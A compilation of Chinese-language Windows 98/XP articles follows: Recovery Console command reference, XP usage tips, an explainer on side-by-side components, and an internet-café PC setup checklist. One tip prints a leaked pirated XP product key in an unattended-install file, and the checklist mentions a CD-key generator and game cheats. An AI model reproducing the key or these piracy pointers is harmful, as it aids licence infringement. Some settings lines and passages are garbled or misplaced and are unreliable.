    Listsvc

    列出计算机上可以使用的服务和驱动程序。listsvc 命令仅在使用故障恢复控制台时才可用。

    listsvc

    参数　　无

    Logon

    登录到 Windows 安装。logon 命令仅在使用故障恢复控制台时才可用。

    logon

    参数　　无

    注意

logon 命令将列出所有检测到的 Windows 安装，需要安装的本地管理员密码才能登录。
如果 3 次登录尝试都失败，“故障恢复控制台”会退出并且计算机将重新启动。
    Net use

    将网络共享连接到驱动器号。含有下列参数的 net use 命令仅在使用故障恢复控制台时可用。在命令提示符下可以使用带不同参数的 net use 命令。

    语法

    net use [ \\ ComputerName\ShareName [ /user:[ DomainName\ ] UserName] password] |[ drive
letter:] [ /d]

    参数

    \\servername\sharename

    指定服务器和共享资源的名称。如果 computername 包含空白字符，则将计算机名从双反斜杠（\\）到计算机名结尾用引号（"）括起来。计算机名长度可以是 1 到 15 个字符。

    /user

    指定建立连接的用户名。

    域名

    确认用户的凭据时所要使用的域名。

    用户名

    指定登录时使用的用户名。

    密码

    指定访问共享资源所需的密码。不输入密码，将给出要键入密码的提示。在密码提示行处键入密码时不显示密码。

    /d

    表示将不断开该连接。

    Set

    显示和设置“故障恢复控制台”的环境变量。set 命令是必须与安全模板一同使用的可选命令。

    含有不同参数的 set 命令仅在使用故障故障恢复控制台时可用。可在命令提示符下使用带不同参数的 set 命令。

    set [ variable=[ string] ]

    参数

    variable

    指定需要设置或修改的变量。

    “故障恢复控制台”支持以下环境变量：

变量 说明
AllowWildCards 允许某些命令（如 del 命令）支持通配符。
AllowAllPaths 允许访问系统上的所有文件和目录。
AllowRemovableMedia 允许文件复制到可移动媒体上，如软盘。
NoCopyPrompt 覆盖现有文件时不显示提示。

    string

    指定要与指定变量关联的字符串。

    范例

    下例允许在某些故障恢复控制台命令中使用通配符：

    set allowwildcards=true

    指定要删除的目录的位置和名称。不能使用通配符。

    注意

目录必须为空否则命令失败。
Rmdir 仅适用于当前 Windows 安装的系统目录、可移动媒体、硬盘分区的根目录或本地安装源。
    Systemroot

    将当前目录设置为用户登录到的 Windows 安装系统的 systemroot 文件夹。systemroot 命令仅在使用故障恢复控制台时可用。

    systemroot

    参数　　无


Win XP高级技巧与应用

《一键清理系统垃圾》

Win XP高级技巧与应用

2002-02-02　　　　作者：

      Win XP推出后，有关Win XP的操作技巧和优化技巧的信息自然也会随之而来，本文将给大家展示一些Win XP的操作技巧（有些是优化技巧，有些是专门针对Win XP的），大部分内容是独创（原创）的——一些在网上出现过的内容，尽可能避免雷同（如有雷同，纯属巧合，^_^），相信对网友们一定有用。
    1[虚拟桌面管理，轻松拥有4个桌面]

    以前我们使用windows操作系统的时候要想有多个桌面，就要装专门的软件。在Win XP中你不需要装这种软件就可以拥有4个桌面。将鼠标指到任务栏，点右键－－>工具－－>desktop manager（虚拟桌面管理器，部分版本没有此项功能）.在任务栏的右下角就会出现5个按钮，这5个按钮分别代表4个桌面和一个预览（4个桌面一起出现在屏幕上）。当你第一次使用这项功能时，这4个桌面的设置都是当前桌面的设置，你可以在此基础上设计个性化的桌面。

    使用这个虚拟桌面管理器要比你想象的稍微复杂一些。在任务栏中的虚拟桌面管理器上点右键，在弹出菜单中选择“configure desktop images”，会出现一个叫“MSVDM settings”的对话框，点击“desktop”选项卡，在这个选项卡上，你可以分别设置4个桌面的背景，至于具体怎么设，大家一看一试就知道了，这里从略。同是在“MSVDM settings”对话框里，有个“shortcut keys”的选项卡，这个选项卡上可以设置4个桌面以及预览的快捷键，默认的是windows徽标键加1，2，3，4，和V。如果使用快捷键，你就可以隐藏虚拟桌面管理器，为任务栏腾出更多的空间。

    在虚拟桌面中，各个桌面可以有自己的背景，自己的桌面设置，你在桌面1上开的程序的窗口在其他桌面上是不显示的，但在任务栏上，该程序的按钮还是在的，点一下就可以在其他桌面打开了。你也可以使在不同桌面下运行的程序在别的桌面上不能打开，使各个桌面各自有各自的程序。在虚拟桌面管理器上点右键，在弹出菜单中去掉“shared desktop”前面的勾即可。

    2[任务栏放大镜，桌面图文清晰可见]

    Win XP设计的适用对象是很广泛的，他考虑到各种轻度残疾的人士，所以Win XP的附件下面有个“辅助工具”，方便听觉和视力差的人使用该操作系统。其实除了这些，任务栏本身就有一个放大镜工具（跟辅助工具里的那个是不一样的，那个是在桌面屏幕的上方显示的，面积大，而这个是在任务栏里显示的，面积小）。在任务栏上右击，选工具栏，在下级菜单中选择“taskbar magnifier”，然后任务栏右方就会出现一个“小方框”，里面有放大图（鼠标所指处），这个图象的放大倍数是可以自定义的，在“小方框”上点右键，在弹出的“zoom”子菜单里选择放大倍数。这个“小方框”很小，如果想大一点，可以拉宽任务栏。

3[“地址”“链接”和“桌面”，访问文件网页更方便]

    右键点击任务栏的空白处，在弹出的菜单中选择“工具栏”，然后分别选择子菜单中的“地址”，“链接”和“桌面”。

    将这些工具放在任务栏可以方便很多，比如你要访问一个网站，可以直接在地址栏里键入网址（如果接上了internet的话），也可以在这里键入比如“D：\”来直接访问各个磁盘，要读软驱就键入“A:\”，要读光驱就直接键入“G:\”（如果光驱时G的话），要发邮件吗？在地址栏里键入“mail to ＋信箱地址”就可以了。链接的作用就不用讲了，大家都知道。那个叫桌面的东东可好用了，你访问文件（如果有很多文件，需要找的话），可以在这里找，这个“桌面”把所有文件都排成树形结构，所有文件及其结构都一目了然，方便了许多。

    你还可以直接访问网站，在一般情况下，当我们想登录到某网站时，都必须先启动Internet Explorer，其实，只要我们单击“开始”→“运行”（或者，win键＋R），并在“打开”项上直接输入网址，系统就会为你连接到相应的网站。如果你在系统中设置了自动拨号的话，它还会为你自动拨号，非常方便。

    4[语言栏：文字，语音，和手写]

    微软对文字服务的概念在Win XP中做了很大的扩充和发展，变成了“语言”的概念，就不仅仅是打字输入的概念了，而是通过各种手段（目前是文字，语音，和手写）来输入信息和指令。当然大多数情况下，人们还是习惯于仅仅使用文字输入的，一般用不上语音输入和手写，即使用手不方便的用户，用语音也是很费力的，它要占用很大的资源，而且语音识别的能力也不能让人恭维，但它展示了一种方向和趋势，也是Win XP作为（至少外观和功能上的）“化时代产品”的一个显著标志，所以在这里介绍一下，有兴趣的朋友可以去“尝鲜”一下。

    一般用户会设置不显示手写输入和语音输入的相关图标，所以在语言栏里，你看不到他们。要显示他们，只需点语言栏的右下角的一个向下的小箭头，然后在弹出的菜单中选择“任务栏中其他图片”这时，这些图标就会出现了——如果还没出现，那是因为相关的系统服务没开，可能是由于你因为要加快开机速度而在msconfig里对开机时启动的服务进行了“优化”，关掉了这些服务。

    以“手写输入”为例，手写输入有两种，一种是接一个外设，就是市场上在卖的那种，然后你可以象平时写字一样在电脑里写你的文字，还有一种是在电脑里用鼠标“写”的，这个有点象写字板，只是你写的字能够被计算机识别，然后变为正楷罢了，用鼠标写字可是很费力的喔，不过，如果你是打拼音的（现在大多数人是用这个），当你遇到一个生僻字，这个字你知道字形，但不知道字音时，这个“手写输入”还是一条不错地解决途径。

5[通知区域自定义，Alt＋tab更清晰]

    不活动的程序图标会被自动隐藏起来，给任务栏的其他图标和按钮腾出了空间，而且在属性里还可以设置哪些显示，哪些不显示——比如你装了一个防火墙软件，它的图标会一直在通知区域，你知道这一点，所以就不用它“通知”你了，这时就可以把它隐藏起来。方法如下，在任务栏右击选“属性”，在弹出的对话框里的“通知区域”中选“自定义”，在弹出另一个对话框，你可以任意设置了。

    还有Alt＋tab键（用来切换任务），也跟win2000不同了，不仅仅显示那些任务的图标，还显示这些任务的窗口的缩略图。这个也是有用的，比如你开了很多网页，在win2000中，你要切换网页时就可能分不清哪个网页是你要看的，有个这个功能，你就可以通过看图来辨认出你要看的网页了。(不同版本的情况有所不同）。

    6[清除 Win XP 共享文件夹]

    打开我的电脑，我们都会注意到有个“共享文件夹”，这个文件夹在我们使用工作组的时候蛮有用，你不用设置什么东西，直接把要共享的文件放到这个共享文件夹里就搞定了，但是实际应用中，很多人并不需要这个文件夹，有时就想把它干掉，但是怎么都找不到在那里设置，这时只有求救注册表了。 打开注册表编辑器（不要说不知道怎么打开啊，运行regedit就ok了）。 找到：
HKEY_LOCAL_MACHINE --> SOFTWARE --> Microsoft -->Windows--> CurrentVersion -->Explorer -->My Computer-->NameSpace --> DelegateFolders -->{59031a47-3f72-44a7-89c5-5595fe6b30ee} ,把这个项del掉就ok了，不过你先得备个奋，或者记下这个值，以后说不定你还会用到它呢。 7[保存搜索结果]
搜索是一个很浪费时间的过程，如果你对自己机器里资料的存放了如指掌，自然很少有用到搜索，但要是你要去公共机房，你要什么东西就常要搜索了，搜索可是很浪费时间的，所以有时你需要把搜索结果保存起来。在你键入你的搜索条件后，执行“立即搜索”。然后右键单击“搜索结果”面板(或选择“文件”菜单)，选择“保存搜索”，并在弹出的对话框中键入文件名和保存位置。以后每次想要运行同样的搜索，只需在资源管理器中找到该文件，然后双击，已保存的搜索标准会很方便地导入到“搜索结果”对话框的合适区域中，无需重复输入搜索标准即可进行搜索。这可是很省力的，还有要提醒大家，有时间研究一下Win XP的搜索助手，其实它的功能十分强大，平时我们都不太使用，但微软的coder们设计的时候可是贯注心力的，研究一下你可以更有效率地使用它，这里就不多说了。

7[任务栏显示快捷方式]

    你可以把你经常用的文件夹和程序拖到任务栏上创建一个快捷方式。你可以在D盘上新建一个文件夹，将其命名为“任务栏文件夹”，将你常用的文件夹和常用程序快捷方式都放到这个文件夹中，然后在任务栏上单击鼠标右键，选择“工具栏”→“新建工具栏”→“系统任务栏”，单击“确定”后，这个工具栏就出现在任务栏上了。在默认情况下，将显示新建工具栏的图标、文字和标题。但可以只让它显示图标，方法为在任务栏上右击 去掉“显示标题”、“显示文字”两项前面的小钩。

    8[去除Win XP的随标提示]

    为了用户使用方面，windows很早就有了提示，比如你的鼠标指到“开始”，它就会出现一个提示行：“单击这里开始”。这实际上是一个链接，我们使用时间长了就不需要它了，可是没有什么地方可是设置不显示提示，要知道这种提示都要占系统资源的，而我们并不需要这些提示，于是就到注册表编辑器里去搞定它：HKEY_CURRENT_USER-->Control PanelDesktop-->LameButton ,把它的键值改为0，然后注销一下（不行就重启），这些浪费资源的提示就没有了。

    9[辨认真假中文版XP]

    下面这个方法是用来查看是否你的Win XP为真正的正文版的。1.执行超级终端机.是否为中文接口及中文名称。如果你的Win XP是英文汉化的，那么在这里肯定会露出马脚。 2.运行dxdiag.exe，如果不行，到system32里找到这个文件（注意要显示所有系统文件后才能找到）.看看directx诊断程序中的系统信息 ，看看系统信息中的操作系统版本是否为5.1build2600 ，看看系统信息中的语言及区域设定是否都为中文 。

    10[安装Win XP不用输序号]

    要做到安装Win XP不用输序号（是不用输，不是不用序号）要有一个前提，就是你的Win XP原文件已经考到了你的硬盘上或者你的光盘是可读写的。方法如下：在I386的文件下放一个叫WINNT.SIF的， 内容如下：

    =====================================================================
    [UserData] ProductKey=FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8
    //注意，这个是你的xp 的注册码，要写在这里，不一定与这个相同
    [Data] AutoPartition=0
    MSDosInitiated=0
    UnattendedInstall=Yes
    [Unattended]
    UnattendMode=GuiAttended
    TargetPath=WINNT
    Hibernation=1
    OemPreinstall=No
    OemSkipEula=Yes
    CrashDumpSetting=0
    DisableDynamicUpdates=Yes
    UnattendSwitch=Yes
    =====================================================================

11[一键完成网络诊断]

    要进行网络诊断，你可以用命令提示符里的相关命令，比如ping，但这些诊断是不全的，要做一个完整的网络诊断，只有在Win XP的帮助中心才能实现，打开“开始”-->“帮助与支持”，在其中找到网络诊断（用搜索搜一下，如果你找不到的话），只要按一下“扫描您的系统”，就可以完成所有的网络诊断，扫描完后，它会给出制作的很漂亮的报告（比命令提示符可好多了，这才叫xp（experience）吗），这个报告即给出了文字的结果，也给出了十分详细的数据，无论是一般用户，还是系统工程师都用的上它。

    12[减少协议开销]

    有许多朋友要做一个浪费资源的行为，就是安装许多网络协议，原因可能是因为他们不清楚这些协议到底是干什么用的，所以就把所有的协议都装了。其实装很多协议是很不好的，你要什么协议就装什么协议，不知道可以试试，和找些资料看，多装协议怎么浪费资源呢？多余的协议：1浪费内存，2降低效率，当一个程序或服务向网路发出请求任务时，系统会在所有的协议中寻找所请求的的服务器或服务，而且，它需要在接受到协议的响应后才能够选定协议，并建立连接，所以这样就会延长时间。

    13[关掉快速切换功能]

    Win XP的一个很引人注目的功能叫做“快速切换”，这个功能为许多人在同一时间使用电脑提供了可能，但是要注意每一项功能总是伴随着资源的损失，如果你的内存少与64M，Win XP在装的时候就被自动禁止掉了，因为这样会使本来就已捉襟见肘的内存的压力更加大，对128M的用户来说，开这个功能虽然没什么关系，但是你又不是很需要这项功能，所以建议把这个功能给关掉。方法如下：控制面板-->用户帐户，点击“更改用户登陆或注销方式”，去掉“使用快速用户切换”就可以了。

    14[Win XP也玩文件夹背景]

    在Win XP以前，我们都可以设置文件夹背景，比如你打开一个文件夹，你可以设置一幅赏心悦目的背景图，这样会增加“XP”，但是Win XP中却没有这项功能。可是很奇怪我的一个朋友的Win XP却可以设置背景。其实他也不是设置，他是从win2000升级到Win XP的，在win2000中他设置了背景，在Win XP中，这个背景还是有效的，我花了些时间终于找到了原因，原来有背景的文件夹里都有个desktop.ini文件，于是我在自己的机器上找，找到了很多desktop.ini，但是这些都没有用，大概是Win XP去除了这项功能之后，所有的desktop.ini里就没了设置文件夹背景的参数，但是我的朋友的Win XP还有背景说明Win XP还是能解释这些参数，于是我把朋友的desktop.ini拷过来，果然有效，所以这里把这个desktop.ini贴出来，大家就可以在Win XP中设置背景了。

    ======================================================================
    [ExtShellFolderViews]
    {BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
    [{BE098140-A513-11D0-A3A4-00C04FD706EC}]
    Attributes=1
    IconArea_Image=E:\picture\girl2\19.jpg
    //这里设置你的背景图片的路径
    [.ShellClassInfo]
    ConfirmFileOp=0
    ======================================================================

15[把网页，图片置于桌面]

    你可以让你的左面图片随时变，你可以把你喜欢的网页一直放在桌面上。这些都是用了Win XP的桌面web功能。方法如下：在桌面上点右键，选择“属性”选项卡，点击自定义桌面，然后在新的对话框中选择“web”，然后“新建”，在又一个新的对话框中，你可以填入n幅图片的路径，这样，这些图片都会出现在桌面，你可以随便选择一幅作为你的桌面图片；你也可以填入n个网页的地址，这样这些网页就会出现在桌面，你可以随时调来浏览，不过这些网页本身是“死”的，尽管你可以点击，但他会打开IE，这个web页实际上被作为图标放在那里了，它的功能是使你的左面变的玄一点。

    16[无桌面操作]

    这里首先要讲一下桌面的概念，也许你已经习惯于把桌面等同与你的显示器平面了，其实严格的讲，桌面是一个特殊的explore程序，是操作体统给用户的一个shell。这里所说的无桌面操作也就是把这个shell关掉的操作，可不是没有显示器的操作（这叫盲操作）。先打开任务管理器，你可以在任务栏上点右键，或者直接按 CTRL＋ALT＋DEL，然后选择“进程”选项卡。找到explore.exe，然后结束这个进程，系统会给一个警告，告诉你说会有丢失数据的危险，不用管他，然后你会发现你的桌面丢了，你的任务栏没了，你的桌面图标也没了，只剩下你的桌面图片了（实际上桌面图片也没了，但是桌面图片已在你的内存中了，所以你还能看到它），你的鼠标还能用，但你无论左键点，还是右键点都没有什么响应了，ok，good，你的桌面没了。这时怎么操作呢？－－用任务管理器，其实你运行的所有程序只不过是一个一个的任务，当然你也可以在任务管理器里实现所有任务的管理，windows提供给我们桌面是为了操作方面，给用户一个友善的interface。我们这样做有什么好处呢，显而易见，explore.exe不运行了可以节省系统资源，如果你的内存少的实在惨不忍睹，那么就试试无桌面操作吧。

这任务管理器的“应用程序”栏，你可以实现打开程序（点“新任务”按钮），关掉程序（点“结束任务”按钮），你可以最大最小化程序窗口，在应用程序的图标上点右键就知道怎么做了——这件事也可以在菜单栏的“窗口”中做。在“关机”菜单栏中，你可以完成待机，重启，关机，休眠，注销，锁定。

    17[优化程序运行]

    程序运行有他们各自的优先次序，所有程序都要占用处理器资源，处理器处理任务有一个先后次序，一般的计算机中有31个优先等级，系统的内核占据了最高的一些等级，这样就能保证系统的稳定，而普通的应用程序一般在比较后面的等级。在普通应用程序中间也有优先次序，他们本来在处理器面前是人人平等的，但还是有些细微的差别，前台的程序（当前正在使用）的优先级要比后台的程序高。

    你可以自己调节应用程序的优先级，打开任务管理器，点到“进程”选项卡，选一个应用程序的进程，点击右键，会弹出一个快捷菜单，选择“设置优先级”，这里有6个等级：实时，高，高与标准，标准，低于标准，低。你可以让你的程序强行调度到更高或更低（自然为别的程序腾出了资源）的等级。如果你不知道某个应用程序的具体进程，可以如下操作：点到“应用程序”选项卡，右键点中一个任务，选择“转到进程”，就会转到该程序的进程，这样你就找到了该程序的进程了。

    好了，上面这18个操作技巧怎么样，如果不是每个都很好，总有几个是你喜欢的吧^_^.还有一个不算秘密的秘密我要告诉大家，重装系统真是提高系统性能的好办法，无论你怎么保养，系统用久了总是会出许多大小毛病的，这些毛病很难医治，只有重头来过才是好办法，你的系统用了很长时间之后重装一次，刚装完时你就能深切地感受到这里的差距了，重装也不繁的（要改变的是观念），Win XP也就1个小时，你作磁盘整理也差不多需要这么多时间的，不过这里要提醒一句，你要把你的email，documents等等资料放到别的系统盘之外，以免丢了资料。还有一个经验，不要长时间地使用休眠，这样会不知不觉地出很多问题，每次启动其实都启动一种“重新来过”的作用，有时出了问题，只要重启一下就可以了，就是这个道理。


Windows XP隔离组件和并列共享

《一键清理系统垃圾》

Windows XP隔离组件和并列共享

2002-02-21　　　　作者：卢军

  Windows XP的一个重要革新就是引入了隔离组件（Isolated Components）和并列共享（side-by-side sharing）功能。作为原来Windows中经常出现的DLL冲突问题的解决方案，Microsoft 强烈建议应用程序使用组件隔离和并列共享技术来解决DLL调用的问题。微软在ComCtl version 6中使用了并列共享处理，证明隔离组件和并列共享是未来Windows的发展方向。在这一节中，我们来了解一些Windows XP的隔离组件和并列共享的整体技术框架。

    在使用隔离组件和并列共享模式下，一个组件的很多个不同版本被同时安装在系统中。注意，是"同时"安装在系统中。在原来的Windows中，系统中一个组件或者是DLL只能有一个版本，因此在安装应用程序的时候，我们经常看到这样的对话框："要安装的xxxx.dll 比系统中原有的要旧，是覆盖还是保留？"。这个问题的确不好问答，因为安装旧的DLL吧，那么原来使用新的DLL的应用程序可能无法正常运行；如果不安装，那么新的应用程序也可能无法正常运行。这真是个两难的问题。

    Windows XP使用隔离组件和并列共享较好地解决了这个问题。由于系统中可以有一个DLL或组件的多个版本同时存在，应用程序在运行的时候可以选择使用自己在设计或开发的时候经过严格测试的组件版本。这样可以避免应用程序被迫调用不同版本的DLL或组件而可能导致的不可预知的错误。

    在Windows XP中，隔离组件和并列共享主要是通过程序清单（manifest）来实现的。通过程序清单，一个应用程序完整地定义了自己运行时需要调用的DLL或组件的版本。Windows XP根据程序清单，保证系统中一个应用程序的升级或删除不会影响到其它的程序需要使用的DLL或组件。所以我们看到，隔离组件和并列共享可以保证系统的安全和应用程序的安全。

    "程序清单（manifest）"是一个XML 文件，包含了一个程序安装和装配的全部信息，例如所有程序捆绑和安装需要的元数据（元数据指程序需要的基本的DLL调用、组件支持、接口定义等），例如COM 类、接口定义和DLL库定义等。清单文件有两类：应用程序清单文件，用来描述应用程序所需要的所有元数据；装配清单文件，用来描述单个组件的安装。

    一个应用程序可以在程序清单中明确地指出自己包含的所有程序部件如何安装在系统中。一个应用程序包含很多基本的元素，例如接口定义、帮助文件、不同版本的组件、系统配置信息等。所有的这些元素，可以根据程序清单分成两类：公有的和私有的。公有元素可以被计算机上安装的其他应用程序使用，他们被安装在Windows XP的WinSxS目录中。私有元素只能被包含他们的应用程序使用，安装在应用程序独有的目录下。


更改IE的默认搜索引擎

《一键清理系统垃圾》

更改IE的默认搜索引擎

    问：我使用的系统是Windows XP。我用超级兔子IE保护器的功能把搜索引擎改为百度的http://www.baidu.com/baidu，可现在超级兔子IE保护器显示的搜索引擎是百度，但实际使用的还是微软的搜索引擎。请问我该怎么办？

    答：首先纠正一下，百度的搜索引擎是http://www.baidu.com。在注册表编辑器中找到HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\CustomizeSearch和HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search\SearchAssistant，将这两个键值修改为：http://www.baidu.com。如果由于某种原因确实不能修改，你可以到http://bar.baidu.com安装一个百度搜霸或IE搜索伴侣。它会自动将IE的默认搜索引擎更改为百度的搜索引擎。


工作站PC配置详细步骤

《一键清理系统垃圾》

工作站PC配置详细步骤

1。系统安装、设置、优化：

    fdisk重新分区：

      c:(系统)--2g　 d:(娱乐)　 e:(备份，临时文件，交换)---2G

   e盘备份拷贝：e:\win98、各种显卡驱动、各种声卡驱动、各种网卡
              (8139--8029-联想dlink)驱动，GHOST

   win98se setup (自定义安装,去掉无用附件,只安装多媒体)

    设置垃圾筒，取消计划任务，文件夹选项设为显示所有

   md e:\temp
         autoexec.bat
             @echo off
             @SET TEMP=E:\TEMP
         @SET TMP=E:\TEMP
             @call e:\txwm\start.bat　　　　　>nul
             @e:\txwm\deltree /y e:\temp\*.*　>nul
             @md e:\temp

    打开“控制面板/系统/性能”，单击“文件系统”。
       1.在“硬盘”选项中，设置“这台计算机主要用于”下拉框，选择“网络服务器”
              设置“预读式优化”为“完全”。
          2.将“软盘”标签中“每次启动就搜寻新的软驱”取消。
          3.单击“图形”选项，设置图形“硬件加速”为“全部”。
          4.虚拟内存管理程序
          “性能\虚拟内存”，选择“用户自己指定虚拟内存设置”选项，再从“硬盘”
      选项中选择C盘以外的盘符，（注意，所选盘符可用空间不可小于100MB！，虚拟内
             存不应该放在系统文件所在的盘区，也不应该放在访问量大的盘区）
               让最大值和最小值相等，设为实际内存的2.5倍
优化MSDOS.SYS

为了提高读盘速度，除了打开硬盘的DMA通道外，还要建立硬盘缓存。方法是：在MSDOS.SYS文件里的[OPTION]短中加入DOUBLEBUFFER=1，如果其中有DBLSPACE=1这一句而你又没有使用硬盘压缩的话，可把此句去掉。经常使用Windows 98系统工具中的磁盘碎片整理程序，它不仅可以消除硬盘上的碎片、整理文件使之连续存放在硬盘上，而且还可以把常用的文件移到硬盘分区前，减少硬盘的寻道时间，从而加快Windows 98的启动。注意：运行整理硬盘前，必须关闭其他应用程序。单击“开始”，选择程序→附件→系统工具→磁盘碎片整理程序，点设置，把“重新安排程序文件以使程序启动更快”的复选框选上，然后选择C盘（Windows 98安装其上盘），单击“确定”，程序就开始为你整理硬盘。

系统配置程序

通过使用Windows 98系统配置程序MSCONFIG.EXE来修改系统配置。单击“开始”，选择“运行”，在打开的输入框内输入MSCONFIG.EXE，单击“确定”启动系统配置程序，单击“常规”标签项，选定“选择性启动”单选框，在此框中只选定“处理SYSTEM. INI文件”和“WIN.INI文件”这两个复选框。不要CONFIG.SYS和AUTOEXECE.BAT文件，这两个文件是提供给纯DOS系统用的设备驱动表和预加载程序表。Windows 98系统不需要它们。单击“启动”标签项，,这个方框内会有多个选项，只要选定SYSTEMTRAY一项即可，SYSTEMTRAY是管理驻留内存的程序，启动时要装入的，所以选定它，方框内列出的其他程序，启动时不必装入，因此可以不选定。通过这样设置，减小了Windows 98启动时的任务量，只调用SYSTEMTRAY一个任务了。运行REGEDIT.EXE程序，在注册表HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion的子键Run、RunOnce、RunOnceEx、RunServices、RunServicesOnce下删除列出的所有应用程序、只保留SysTray.Exe程序；删除Windows 98菜单的程序/启动中的所有东东。这样可以保证Windows 98启动时只启动SysTray.Exe这一个程序,从而极大地减轻了启动任务、加速启动过程。

    调整虚拟设备缓存
    VCache是Windows虚拟设备的磁盘缓存，它对系统的运行起着至关重要的作用，使Windows拥有了非常优秀的磁盘性能。一般而言，Windows会自动设定使用最大量的内存来当作VCache的空间，但它是一个非常贪婪的系统，有时甚至会消耗所有的内存来作VCache，等其他程序向Windows要求内存空间时，它才会释放一部分内存给其他程序来运行，如果程序需求内存空间较大就有可能出现“非法操作”。因此，我们有必要对它的数值进行设置，这样不仅可以节省系统计算VCache的时间，而且可以保证其他程序对内存的要求。一般来说，该数值的大小应为物理内存的25％，比如你的物理内存为32MB，那么它们就应该设为8MB，64MB时为16MB，并非越大越好。如果选择的数值不正确，很可能会造成运行大程序时硬盘会狂转或是系统内存被占用过多等问题。同时，由于Windows使用了更为先进的VCache，因此应将以前加载的如Smartdrv之类的磁盘缓存程序从系统配置文件中去掉。
    以128MB内存的电脑为例，设置方法为：打开“附件”、“系统工具”、“系统信息”，选择“工具”菜单下的“系统配置实用程序”，选择“System．ini”文件，找到［VCache］小节，单击界面下的“添加”按钮，然后在该小节中加上以下三行内容：
    MinFileCacheΚ32768
    MaxFileCacheΚ32768
    ChunkSizeΚ1024

     history
     Windows临时文件目录的设置(C:\WINDOWS\Temporary Internet Files)

    拷贝其它机上winrar安装后文件，不在本机安装，不创建默认关联打开方式

    运行vxd.bat安装七个 漏装的虚拟设备驱动程序
    vb运行库:copy msvbvm60.dll c:\windows\system

    首先装主板驱动
            (VIA威盛　　4-IN-1最新驱动
            Intel　　　Intel Chipset Software Installati on Utility最新驱动
                       ---intel安装主板驱动后先启动到安全模式，再启动到正常模式
                       Intel Application ACCELERATOR应用程序加速器)

         显卡驱动安装

         声卡(intel ac97\win98gold--不用wdm)

         网卡驱动安装,网络设置：
             把"Link Speed/Duplex Mode"设置成"100 Full Mode"；
               去掉“拨号适配器”
              添加“IPX，TCP/IP” ,不加NETBEUI，不添加共享服务。
               计算机名-----“01号机”。。。。“70号机”
                           “70号机一室”。。。“79号机一室”
               IP地址-------计算机号加100
               网关--192.168.0.1　 DNS--202.99.160.68 202.99.166.4
              主机：SERVER　域：为空　 windows登录

         安装DirectX 8.1

         windowsupdate

    超级兔子魔法2002

     windows优化大大师

电源使用方案：其中“关闭监视器”建议选择30分钟为宜，而“关闭硬盘”这里选择“从不”，因为对硬盘进行关闭的话，再重新启动对磁头有很大的伤害；

    显示器刷新率达到85Hz就足够

     安装瑞星

3。应用软件、游戏 安装、设置：

         安装flash6插件(http://www.macromedia.com),打www.0318.net测试
         flash播放器
          输入法：只保留“智能ABC”“五笔86”“五笔加加”
          OIcq--------(去掉藤讯浏览器:copy IE到OICQ目录，改名为TWBROWERS.EXE)
         uc
         金山打字通2002
         osplayer
         windows-media-player 7.1
         豪杰超级解霸2001
         realplayer(连接速度设为10m) rmvb补丁(realvideo 9) 不自动升级
         (DIVX-MPEG4编码器　 wmv8编码解码器 xvid编码解码器
         AC3 Filter 音频工具) (详www.168101.com)
         divx--5.02
         flash播放器
         所有电影格式试看，,默认播放路径
         默认播放格式设置----无间道　英雄

         源源网吧音像大世界,设置

        备份c1.gho

       d:(娱乐)游戏(安装)：
      系统注册表尽量保证是刚做完系统时的注册表，
      没有任何游戏注册信息在内，非常干净和小巧
      把游戏分离注册表，整理好拷贝过来

        联众(装在d:盘)
        中国游戏中心在线游戏(装在d:盘)
        边锋

        反恐精英+cdkey生成器修改器　 战网补丁
              怎么样提高CS中的FPS(以上仅适用于Nvidia的卡 )
              opengl：
              关掉“启用缓冲区扩展““允许双面扩展使用本机视频内存“
              禁用对cpu增强指令集的支持
              纹理的默认颜色深度：始终使用16bpp
              缓冲翻转模式：使用位块传输
              垂直同步：始终关闭
              各向异性过滤：已禁用
              最大使用量：14
              d3d：
              关掉“启用雾化仿真“
              mip“最佳性能“
              pci纹理“23"
              在cstrike目录下的config.cfg里修改fps_max "100"

        红警2-共和国之辉
        梦幻麻将
        抢滩登录
        雷神
        摩托车-------需安装
        打野鸡
        碟王
        星际争霸
        魔兽争霸3
        三国群英传2/3
        三角洲力量
        极品飞车
        雷电

        传奇(d:\传奇外挂　快捷方式　--私服)
        疯狂坦克2　　http://www.ft2.com.cn/-------需安装
        流星蝴蝶剑 meteor.reg
        暗黑----战网补丁
        奇迹
         骑士Online
        Online百战天虫
        战场
        天龙八步
        克洛斯　　　 www.gameking.com.cn/online/cronous/
        大话西游
        江湖
        混乱冒险
        天堂
        魔力
         红月
        破天一剑　http://pcik.catv.net/
        破碎银河系
        决战
         幻灵

        大海战
        天骄秦殇
        石器时代
        轩辕剑
        神代血印
        幻灵
        三国策OnLine
        武魂　　　　 www.muhon.com.cn/ -------需安装
        精灵
        风云
        千年
         龙族
         命运
         倚天

         动画

        所有游戏、软件试玩、设置

        d:盘所有安装后文件后或安装文件在服务器要有备份，以备损坏时可以立即拷贝或
         安装

3。系统整理、安全设置：

    万象安装（注意安装客户端、服务端升级补丁）
     万象设置：
       一般设置：-----选择以下各项
        使用网络集中管理模式：
采用无界面模式执行：
        强行将主页设为以下连接并禁止修改：
            源源网吧主页 \\反恐服务器\源源网吧主页\Htdocs\index.html
             或 http://xinghe.net.cn/chat/zahc.htm
        在锁定屏幕上显示关机按钮：
        1分钟无人使用则关闭计算机

       密码设置：前后“空格”(sicent)

    IE设置：
       常规---
            主页（ 源源网吧主页\\反恐服务器\源源网吧主页\Htdocs\index.html
                 或　http://xinghe.net.cn/chat/zahc.htm ）
            历史记录天数（保留记录天数为60）

       运行ie.reg
          REGEDIT4
[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]
          "NoBrowserSaveAs"=dword:00000001　　　　 禁用“另存为……”
          "NoFileOpen"=dword:00000001　　　　　　　禁用“打开”
          "NoFavorites"=dword:00000001　　　　　　 禁用“收藏”菜单
          "NoFindFiles"=dword:00000001　　　　　　 禁用F3的查找功能

    狼牙借口IV(减小库，设置狼牙)

   清理桌面、开始菜单、程序组：
        桌面添加衡水宽带，醉爱红尘快捷方式,源源网吧音像大世界　手工排列桌面图标
               电影、歌曲、FLASH目录快捷方式
      程序--->　　删除没用菜单　　删除所有卸载菜单

   网络游戏快捷方式都放在桌面
   脱网游戏快捷方式拷贝到d:\游戏，并隐藏此目录
   建立程序组游戏目录，中国游戏在线.com(修改图标)
